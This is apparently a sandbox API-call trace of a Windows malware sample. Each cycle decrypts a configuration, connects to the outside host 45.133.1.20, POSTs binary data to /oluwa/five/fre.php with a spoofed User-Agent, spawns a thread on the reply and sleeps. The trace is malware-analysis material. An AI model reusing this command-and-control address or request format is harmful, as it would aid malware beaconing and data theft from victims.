0x6b3670 [0314.677] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0314.678] GetProcessHeap () returned 0x6a0000 [0314.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0314.678] GetProcessHeap () returned 0x6a0000 [0314.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0314.679] GetProcessHeap () returned 0x6a0000 [0314.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0314.679] GetProcessHeap () returned 0x6a0000 [0314.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0314.680] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.681] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0314.691] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.691] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0314.701] GetProcessHeap () returned 0x6a0000 [0314.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0314.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.703] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0314.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.706] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0314.706] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.707] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0314.707] GetProcessHeap () returned 0x6a0000 [0314.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0314.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.708] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0314.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.709] CryptDestroyKey (hKey=0x6ad560) returned 1 [0314.710] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.710] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0314.710] GetProcessHeap () returned 0x6a0000 [0314.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0314.710] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.711] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0314.711] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.712] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0314.712] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.713] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0314.713] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.714] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0314.714] GetProcessHeap () returned 0x6a0000 [0314.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0314.714] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0314.714] GetProcessHeap () returned 0x6a0000 [0314.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0314.714] socket (af=2, type=1, protocol=6) returned 0xc0c [0314.716] connect (s=0xc0c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0314.743] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0314.743] GetProcessHeap () returned 0x6a0000 [0314.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0314.744] GetProcessHeap () returned 0x6a0000 [0314.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0314.745] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.746] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0314.746] GetProcessHeap () returned 0x6a0000 [0314.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df928 [0314.746] GetProcessHeap () returned 0x6a0000 [0314.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0314.748] GetProcessHeap () returned 0x6a0000 [0314.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0314.748] GetProcessHeap () returned 0x6a0000 [0314.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0314.749] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.750] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0314.750] GetProcessHeap () returned 0x6a0000 [0314.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0314.750] GetProcessHeap () returned 0x6a0000 [0314.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0314.753] send (s=0xc0c, buf=0x6bd460*, len=242, flags=0) returned 242 [0314.753] send (s=0xc0c, buf=0x6bb998*, len=159, flags=0) returned 159 [0314.754] GetProcessHeap () returned 0x6a0000 [0314.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0314.754] recv (in: s=0xc0c, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0314.820] GetProcessHeap () returned 0x6a0000 [0314.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0314.821] GetProcessHeap () returned 0x6a0000 [0314.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0314.821] GetProcessHeap () returned 0x6a0000 [0314.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df928 | out: hHeap=0x6a0000) returned 1 [0314.822] GetProcessHeap () returned 0x6a0000 [0314.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0314.822] closesocket (s=0xc0c) returned 0 [0314.823] GetProcessHeap () returned 0x6a0000 [0314.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0314.823] GetProcessHeap () returned 0x6a0000 [0314.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0314.825] GetProcessHeap () returned 0x6a0000 [0314.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0314.826] GetProcessHeap () returned 0x6a0000 [0314.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0314.828] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1948) returned 0xc0c [0314.830] Sleep (dwMilliseconds=0xea60) [0314.831] GetProcessHeap () returned 0x6a0000 [0314.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0314.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.833] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0314.841] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.841] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0314.855] GetProcessHeap () returned 0x6a0000 [0314.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0314.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.860] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0314.861] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.861] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0314.862] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.863] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0314.863] GetProcessHeap () returned 0x6a0000 [0314.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0314.864] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.864] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0314.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.866] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0314.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.867] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0314.867] GetProcessHeap () returned 0x6a0000 [0314.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0314.871] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.872] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0314.872] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.873] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0314.874] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.874] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0314.875] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.875] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0314.875] GetProcessHeap () returned 0x6a0000 [0314.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0314.876] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0314.876] GetProcessHeap () returned 0x6a0000 [0314.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0314.876] GetProcessHeap () returned 0x6a0000 [0314.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0314.877] GetProcessHeap () returned 0x6a0000 [0314.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0314.877] GetProcessHeap () returned 0x6a0000 [0314.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0314.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.879] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0314.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.889] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0314.900] GetProcessHeap () returned 0x6a0000 [0314.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0314.905] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.906] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0314.906] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.907] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0314.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.908] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0314.908] GetProcessHeap () returned 0x6a0000 [0314.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0314.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.919] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0314.919] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.920] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0314.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.921] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0314.921] GetProcessHeap () returned 0x6a0000 [0314.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0314.922] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.922] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0314.925] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.926] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0314.926] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.927] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0314.928] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.928] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0314.928] GetProcessHeap () returned 0x6a0000 [0314.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0314.928] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0314.928] GetProcessHeap () returned 0x6a0000 [0314.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0314.928] socket (af=2, type=1, protocol=6) returned 0xc10 [0314.928] connect (s=0xc10, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0314.952] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0314.952] GetProcessHeap () returned 0x6a0000 [0314.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0314.952] GetProcessHeap () returned 0x6a0000 [0314.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0314.953] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.954] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0314.954] GetProcessHeap () returned 0x6a0000 [0314.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df3e8 [0314.954] GetProcessHeap () returned 0x6a0000 [0314.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0314.955] GetProcessHeap () returned 0x6a0000 [0314.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0314.955] GetProcessHeap () returned 0x6a0000 [0314.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0314.957] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.958] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0314.958] GetProcessHeap () returned 0x6a0000 [0314.958] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0314.958] GetProcessHeap () returned 0x6a0000 [0314.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0314.959] send (s=0xc10, buf=0x6bd460*, len=242, flags=0) returned 242 [0314.959] send (s=0xc10, buf=0x6bb998*, len=159, flags=0) returned 159 [0314.959] GetProcessHeap () returned 0x6a0000 [0314.960] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0314.960] recv (in: s=0xc10, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0315.031] GetProcessHeap () returned 0x6a0000 [0315.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0315.032] GetProcessHeap () returned 0x6a0000 [0315.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0315.034] GetProcessHeap () returned 0x6a0000 [0315.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df3e8 | out: hHeap=0x6a0000) returned 1 [0315.034] GetProcessHeap () returned 0x6a0000 [0315.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0315.034] closesocket (s=0xc10) returned 0 [0315.035] GetProcessHeap () returned 0x6a0000 [0315.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0315.035] GetProcessHeap () returned 0x6a0000 [0315.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0315.035] GetProcessHeap () returned 0x6a0000 [0315.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0315.036] GetProcessHeap () returned 0x6a0000 [0315.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0315.036] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x194c) returned 0xc10 [0315.038] Sleep (dwMilliseconds=0xea60) [0315.039] GetProcessHeap () returned 0x6a0000 [0315.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0315.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.040] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0315.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.048] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0315.102] GetProcessHeap () returned 0x6a0000 [0315.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0315.103] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.103] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0315.104] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.104] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0315.104] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.105] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0315.105] GetProcessHeap () returned 0x6a0000 [0315.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0315.106] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.106] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0315.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.107] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0315.108] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.108] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0315.108] GetProcessHeap () returned 0x6a0000 [0315.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0315.109] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.109] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0315.112] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.112] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0315.113] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.113] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0315.114] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.114] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0315.114] GetProcessHeap () returned 0x6a0000 [0315.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0315.114] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0315.115] GetProcessHeap () returned 0x6a0000 [0315.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0315.115] GetProcessHeap () returned 0x6a0000 [0315.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0315.115] GetProcessHeap () returned 0x6a0000 [0315.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 